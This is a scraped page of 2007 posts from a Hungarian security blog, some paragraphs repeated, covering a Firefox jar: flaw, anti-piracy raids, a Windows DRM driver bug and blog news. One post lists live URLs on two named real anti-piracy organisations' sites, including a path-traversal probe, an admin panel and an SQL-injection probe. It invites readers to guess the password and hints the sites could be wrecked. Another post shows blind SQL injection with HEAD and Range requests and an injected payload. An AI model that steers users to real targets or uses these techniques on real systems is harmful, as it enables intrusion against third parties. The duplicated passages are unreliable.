A hibára három napja pdp hívta fel újra a figyelmet, hangsúlyozandó annak kritikus voltát. Ma pedig beford jelentetett meg egy elég impresszív PoC kódot, ami kiolvassa a látogató Google kontaktlistáját (amennyiben be van jelentkezve), ezzel rávilágítva arra, hogy azok az oldalak is veszélyben vannak, akik nyílt átirányítást (?redirect=url) alkalmaznak - így ugyanis el lehet hitetni a böngészővel, hogy a .jar az átírányító oldalról (pl. Google) származik. A problémát tovább súlyosbítja, hogy a NoScript egyelőre nem véd az ilyen támadások ellen (bár a fejlesztői verzióba már berakták az új fícsört), valamint az antivírus programoknak is sok fejtörést lehet okozni pl. több .jar fájl egymásba ágyazásával, de érdekes támadási lehetőségeket rejt az is, hogy az OpenOffice .odt, valamint a Microsoft Office 2007 .doc formátuma a .jar-hoz hasonlóan a .zip formátumra épül.
A Mozillának csipkednie kell magát, ha be akarja tartani a szavát a "tíz kiba* nappal" kapcsolatban. Szigorú értelemben véve már el is késtek jócskán...
Tudom ajánlani az Opera böngészőt, amíg kijön a patch. Nem annyira fullos mint a Firefox, de jobb mint az Explorer, és nincs rá annyi hiba.
Update: Ma kijött a NoScript 1.1.8 "JAR Jammer", ami nevének megfelelően kiszűri ezeket a támadásokat. Nekem minden esetre már kezd kicsit fájdalmassá válni, hogy annyi bugot találnak a Firefoxban, hogy nem győzöm őket kiposztolni...
Címkék: firefox jar
Kalózkodás, rosszalkodás...
2007.11.09. 17:35 | buherator | 116 komment
Kezdek már roszul látni az egyik szememre, de úgy érzem hogy a tegnapi lefolgalásokról itt is érdemes (még több) szót ejteni. Itt ugyanis nem egyszerűen arról van szó, hogy megbukott néhány sportkocsiban furikázó bűnöző, meg néhány srác nem kapja meg a napi pornó/sorozat adagját.
FTP szervert üzemeltetni jogvédett tartalommal bizony nem szép dolog, pénzt kérni a letöltésért meg már túlmegy pár határon (ameddig nem pl. itthon nem elérhető tartalmakról beszélünk...). Torrent trackert üzemeltetni szintén nem szép dolog (legalabbis bizonyos tartalmakkal), azonban teljesen legális.
Megalapozatlanul, csak úgy elvenni valaki más tulajdonát nem szép dolog. Szar minőségű terméket előállítani majd a vásárlóra erőszakolni (ez a legális, ezt kell megvenni) szintén. Kiadóként arról papolni, hogy mennyire megkárosítják szegény művészeket a kalózok, aztán kedves vásárlók pénzén cirkuszt rendezni a SYMA csarnokban ugyancsak piszkálja az ember igazságérzetét. Hologrammos matricával tolvajnak bélyegezni sok millió (milliárd?) embert, ezzel együtt a vélt bűnükért fizetendő büntetést bevasalni tiszességtelen, jogellenes, szemét dolog!
Bár tegnap a BSA lett kivesézve, úgy tűnik, hogy az akciót az ASVA és a ProArt indította. Utóbbiak úgy tűnik, idiótákra bízzák a munkát:
http://www.hangfoglalas.hu/?m=/../../index
http://www.hangfoglalas.hu/admin/
A jelszó kitalálását mindenkire rábízom ;) SQL inject is lesz benne.
Update: a ProArt oldala is bugos...
http://www.proart.hu/?menu=hirek&id=65'
Az információk persze csak tájékoztató jellegűek, de azt azért csendben megjegyezném, hogy laza csuklómozdulattal tönkre lehet vágni mindkét oldalt, ha van az emberben erre hajlam...
FTP szervert üzemeltetni jogvédett tartalommal bizony nem szép dolog, pénzt kérni a letöltésért meg már túlmegy pár határon (ameddig nem pl. itthon nem elérhető tartalmakról beszélünk...). Torrent trackert üzemeltetni szintén nem szép dolog (legalabbis bizonyos tartalmakkal), azonban teljesen legális.
Megalapozatlanul, csak úgy elvenni valaki más tulajdonát nem szép dolog. Szar minőségű terméket előállítani majd a vásárlóra erőszakolni (ez a legális, ezt kell megvenni) szintén. Kiadóként arról papolni, hogy mennyire megkárosítják szegény művészeket a kalózok, aztán kedves vásárlók pénzén cirkuszt rendezni a SYMA csarnokban ugyancsak piszkálja az ember igazságérzetét. Hologrammos matricával tolvajnak bélyegezni sok millió (milliárd?) embert, ezzel együtt a vélt bűnükért fizetendő büntetést bevasalni tiszességtelen, jogellenes, szemét dolog!
Bár tegnap a BSA lett kivesézve, úgy tűnik, hogy az akciót az ASVA és a ProArt indította. Utóbbiak úgy tűnik, idiótákra bízzák a munkát:
http://www.hangfoglalas.hu/?m=/../../index
http://www.hangfoglalas.hu/admin/
A jelszó kitalálását mindenkire rábízom ;) SQL inject is lesz benne.
Update: a ProArt oldala is bugos...
http://www.proart.hu/?menu=hirek&id=65'
Az információk persze csak tájékoztató jellegűek, de azt azért csendben megjegyezném, hogy laza csuklómozdulattal tönkre lehet vágni mindkét oldalt, ha van az emberben erre hajlam...
Címkék: artisjus szabadság asva proart
BSA akcióban
2007.11.08. 21:26 | buherator | 2 komment
"A mai nap folyamán elvileg több, mint 80db szervert foglaltak le. Céges szervereket, torrent trackerek szervereit..."
Először is a következőket szeretném (ismételten) leszögezni:
Először is a következőket szeretném (ismételten) leszögezni:
- A BSA ugyanakkora jogkörrel rendelkezik, mint az Alsófenékpusztai Nyugdíjas Versmondó Egylet, nem rendelkeznek hatósági jogkörrel, csak feljelentgetni tudnak (de azt nagyon)
- Torrent szervereket lefogalalni egyszerű ostobaság, a hozzánemértés ékes példája. Egy ilyen gép definició szerint kizárólag metaadatokat tárol az általa menedzselt tartalmakról. Nincs az az ágyúval fejbedurrantott , idióta kalóz, aki a trackeréről seedelne.
21:36 - bar torrenten nincs fent, de weben mar kint van a baratok koztÉs most következzen egy kis szemezgetés a Homár idevágó posztjaiból és kommentjeiből:
Címkék: móka bsa
A Hacker szócikk
2007.11.08. 18:14 | buherator | Szólj hozzá!
Ez az informatikai tárgyú lap még csak csonk (azaz erősen hiányos). Segíts te is, hogy igazi szócikk lehessen belőle!
Mert Wikit írni igazi h4x0rság ;) De tényleg!
Mert Wikit írni igazi h4x0rság ;) De tényleg!
Címkék: wiki wikipedia
Hatékonyabb SQL Injection
2007.11.07. 14:23 | buherator | Szólj hozzá!
Stefano Di Paola és Giorgio Fedon egy hasznos kis trükköt mutattak be a vak SQL Injection támadások sávszélességkímélő kivitelezésére:
Vak támadások esetén sokszor elég a kiszolgáló válaszainak hosszát elemezni, hogy rájöjjünk, miként futott le az általunk beszúrt kód. Ehhez viszont elvileg felesleges lekérnünk a teljes dokumentumot, hiszen a HEAD tartalmazza a Content-Length attribútumot, ami már tartalmazza a szükséges információt. Hogyan lehet elérni, hogy a webszerver csak a válasz fejlécét küldje vissza? Az Apache-ot (az RFC-nek megfelelően) nem lehet rávenni a dologra egy egyszerű HEAD kéréssel:
Vak támadások esetén sokszor elég a kiszolgáló válaszainak hosszát elemezni, hogy rájöjjünk, miként futott le az általunk beszúrt kód. Ehhez viszont elvileg felesleges lekérnünk a teljes dokumentumot, hiszen a HEAD tartalmazza a Content-Length attribútumot, ami már tartalmazza a szükséges információt. Hogyan lehet elérni, hogy a webszerver csak a válasz fejlécét küldje vissza? Az Apache-ot (az RFC-nek megfelelően) nem lehet rávenni a dologra egy egyszerű HEAD kéréssel:
HEAD /index.php HTTP/1.1
Host: 127.0.0.1
Accept: */*
HTTP/1.1 200 OK
Date: Mon, 05 Nov 2007 21:00:07 GMT
Server: Apache
Content-Type: text/html
De ha részenként kérjük le a dokumentumot a Range fejléc segítségével:
GET /index.php HTTP/1.1
Host: 127.0.0.1
Accept: */*
Range: bytes=-1
HTTP/1.1 206 Partial Content
Date: Mon, 05 Nov 2007 21:03:15 GMT
Server: Apache
Content-Range: bytes 89-89/90
Content-Length: 1
Content-Type: text/html
A Content-Range megadja a dokumentum teljes hosszát! Mi a helyzet a többi kiszolgálóval? A nagy vetélytárs IIS úgy tűnik, nem követi az RFC-ben ajánlottakat, és a HEAD kérés rögtön célra vezet:
HEAD /search.aspx HTTP/1.1
Host: 127.0.0.1
Accept: */*
Content-Length: 22
search=all'+AND+'1'='1
HTTP/1.1 200 OK
Date: Mon, 05 Nov 2007 21:14:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 4790
Content-Type: text/html
Expires: Mon, 05 Nov 2007 21:14:00 GMT
Set-Cookie: ASPSESSIONIDSQTCRTQA=XXXXXXXXXXXXXXXXXXX; path=/
Cache-control: private
Az IBM HTTP és WebSphere alkalmazásai az Apache-hoz hasonlóan viselkednek. Ha van alkalmatok más szoftvereket is tesztelni, ne habozzatok megosztani az eredményeket Stefano blogján vagy akár itt!
Címkék: sql injection
DRM hibát használnak ki Windowsokon
2007.11.07. 10:39 | buherator | Szólj hozzá!
A Microsoft megerősítette, hogy támadók aktívanpróbálnak kihasználni egy, a Windows XP-vel és Windows Server 2003-mal érkező secdrv.sys-ben lévő hibát. Ez a fájl a Macrovision Security Driver - tehát egy külső cég szoftvere - amely a játékok másolásvédelmét biztosítja. A hiba helyben kihasználható, privilégiumkiterjesztést biztosít. Ugyanennek a másolásvédelemnek a frissített verzióját használja a Vista is, de azt a sebezhetőség nem érinti. A Microsoft ígért patchet, de a Macrovisiontől származó frissített driver is orvosolja a problémát. Szeretjük a DRM-et!
Címkék: windows drm
Hírek a blogvilágból
2007.11.06. 17:32 | buherator | Szólj hozzá!
- Gyaloghacker idő hiányában abbahagyta a blogolást, és a bejegyzéseit is eltávolította. Kár érte.
- A Hacker Webzine ezen túl regisztrációhoz köti az olvasást, jelenleg az előregisztráció zajlik. Kíváncsi vagyok mi lesz a dologból, az minden esetre valószínű, hogy ezen túl nem fogom tudni ide posztolni az ott megjelenő írásokat.
Update: A dolog soceng. akció volt a regisztrálók jelszavainak megszerzésére, állítólag nem is rossz eredményekkel: a kb. 400 begyűjtött jelszó kb. 30%-a valószínűleg használható lett volna más, fontos helyen is (bár itt azt hiszem kicsit sok a valószínűségi változó..). Azoknak sem kell azonban elkeseredni, akik regisztráltak: készül ugyanis egy fórum, amelyre a regisztrált accountok használhatók lesznek, Ronald pedig törölte a titkosítatlan jelszavakat...legalábbis ezt állítja. - Sirdarckcat és Kuza55 megpróbálta megtörni RSnake blogját, a ha.ckers.org-ot. Bár a támadás igen jól kigondolt és összetett volt - Social engineering+NoScript bug+CSS alapú támadás, hogy csak a dolog gerincét említsem - nem járt sikerrel, RSnake ellenben igen csak felkapta a vizet, mivel a támadók - akikkel egyébként régi cimborák - egy tipikus alázó szöveget próbáltak megjeleníteni vele kapcsolatban. Kuzáék ezután nyilvánosan is többször bocsánatot kértek, mondván viccnek szánták az egészet, némi flameelés után pedig úgy tűnik, sikerült megoldani a konfliktust, és újra béke uralkodik a széna azon felében.
- Végül de nem utolsó sorban: mostanában kissé feltorlódtak a dolgaim, úgyhogy ritkábban tudok posztolni, de ez valószínűleg nem lesz tartós. Ha valakinek van kedve kicsit besegíteni, az írjon üzenetet bátran!